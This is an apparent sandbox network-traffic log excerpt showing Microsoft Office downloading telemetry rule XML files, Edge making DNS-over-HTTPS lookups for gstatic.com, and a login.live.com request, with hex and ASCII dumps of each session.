2024-11-11 23:06:23 UTC	486	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
25	192.168.2.5	49781	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:23 UTC	192	OUT	GET /rules/rule120618v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 23:06:23 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:23 GMT Content-Type: text/xml Content-Length: 486 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT ETag: "0x8DC582B9018290B" x-ms-request-id: 1958a6a9-101e-0046-5bd5-3391b0000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T230623Z-174f7845968jrjrxhC1EWRmmrs00000005mg00000000th8w x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 23:06:23 UTC	486	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
26	192.168.2.5	49779	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:23 UTC	192	OUT	GET /rules/rule120615v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 23:06:23 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:23 GMT Content-Type: text/xml Content-Length: 407 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT ETag: "0x8DC582BBAD04B7B" x-ms-request-id: dc8e78b0-f01e-0085-35d5-3388ea000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T230623Z-174f7845968qj8jrhC1EWRh41s00000005h000000000bhm6 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 23:06:23 UTC	407	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
27	192.168.2.5	49780	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:23 UTC	192	OUT	GET /rules/rule120617v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 23:06:23 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:23 GMT Content-Type: text/xml Content-Length: 427 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT ETag: "0x8DC582BA310DA18" x-ms-request-id: 5f7101d7-901e-0048-4fd5-33b800000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T230623Z-174f7845968ljs8phC1EWRe6en00000005a000000000tqzm x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 23:06:23 UTC	427	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.5	49784	172.64.41.3	443	7344	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:24 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-11-11 23:06:24 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP
2024-11-11 23:06:24 UTC	247	IN	HTTP/1.1 200 OK Server: cloudflare Date: Mon, 11 Nov 2024 23:06:24 GMT Content-Type: application/dns-message Connection: close Access-Control-Allow-Origin: * Content-Length: 468 CF-RAY: 8e11eebe0f766a58-EWR alt-svc: h3=":443"; ma=86400
2024-11-11 23:06:24 UTC	468	IN	Data Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 fc 00 04 8e fa 50 43 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcomPC)

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.5	49785	172.64.41.3	443	7344	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:24 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-11-11 23:06:24 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP
2024-11-11 23:06:24 UTC	247	IN	HTTP/1.1 200 OK Server: cloudflare Date: Mon, 11 Nov 2024 23:06:24 GMT Content-Type: application/dns-message Connection: close Access-Control-Allow-Origin: * Content-Length: 468 CF-RAY: 8e11eebe0bf142f2-EWR alt-svc: h3=":443"; ma=86400
2024-11-11 23:06:24 UTC	468	IN	Data Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 08 00 04 8e fb 29 03 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom))

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.5	49787	162.159.61.3	443	7344	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:24 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-11-11 23:06:24 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP
2024-11-11 23:06:24 UTC	247	IN	HTTP/1.1 200 OK Server: cloudflare Date: Mon, 11 Nov 2024 23:06:24 GMT Content-Type: application/dns-message Connection: close Access-Control-Allow-Origin: * Content-Length: 468 CF-RAY: 8e11eebf3a888cb4-EWR alt-svc: h3=":443"; ma=86400
2024-11-11 23:06:24 UTC	468	IN	Data Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 ad 00 04 8e fa 51 e3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcomQ)

Session ID	Source IP	Source Port	Destination IP	Destination Port
31	192.168.2.5	49789	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:24 UTC	192	OUT	GET /rules/rule120621v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 23:06:24 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:24 GMT Content-Type: text/xml Content-Length: 415 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT ETag: "0x8DC582BA41997E3" x-ms-request-id: 7eed3662-201e-003f-1ad5-336d94000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T230624Z-174f7845968qj8jrhC1EWRh41s00000005gg00000000dc0w x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 23:06:24 UTC	415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru

Session ID	Source IP	Source Port	Destination IP	Destination Port
32	192.168.2.5	49788	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:24 UTC	192	OUT	GET /rules/rule120620v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 23:06:24 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:24 GMT Content-Type: text/xml Content-Length: 469 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT ETag: "0x8DC582BBA701121" x-ms-request-id: 33d00c7b-501e-007b-28d5-335ba2000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T230624Z-174f7845968t42glhC1EWRa36w00000005bg000000007zhv x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 23:06:24 UTC	469	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
33	192.168.2.5	49791	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:24 UTC	192	OUT	GET /rules/rule120624v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 23:06:24 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:24 GMT Content-Type: text/xml Content-Length: 494 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT ETag: "0x8DC582BB7010D66" x-ms-request-id: 2f59f176-901e-002a-79d5-337a27000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T230624Z-174f7845968nnm4mhC1EWR1rn400000005k000000000a39x x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 23:06:24 UTC	494	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
34	192.168.2.5	49792	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:24 UTC	192	OUT	GET /rules/rule120623v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 23:06:24 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:24 GMT Content-Type: text/xml Content-Length: 464 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT ETag: "0x8DC582B97FB6C3C" x-ms-request-id: 4e338842-401e-0016-31d5-3353e0000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T230624Z-174f7845968psccphC1EWRuz9s00000005vg0000000093ep x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 23:06:24 UTC	464	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor

Session ID	Source IP	Source Port	Destination IP	Destination Port
35	192.168.2.5	49790	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:24 UTC	192	OUT	GET /rules/rule120622v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 23:06:24 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:24 GMT Content-Type: text/xml Content-Length: 477 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT ETag: "0x8DC582BB8CEAC16" x-ms-request-id: cd0babfe-b01e-0002-56d5-331b8f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T230624Z-174f7845968j6t2phC1EWRcfe800000005sg000000009bx9 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 23:06:24 UTC	477	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.5	49786	40.126.32.68	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:24 UTC	422	OUT	POST /RST2.srf HTTP/1.0 Connection: Keep-Alive Content-Type: application/soap+xml Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68}) Content-Length: 3592 Host: login.live.com
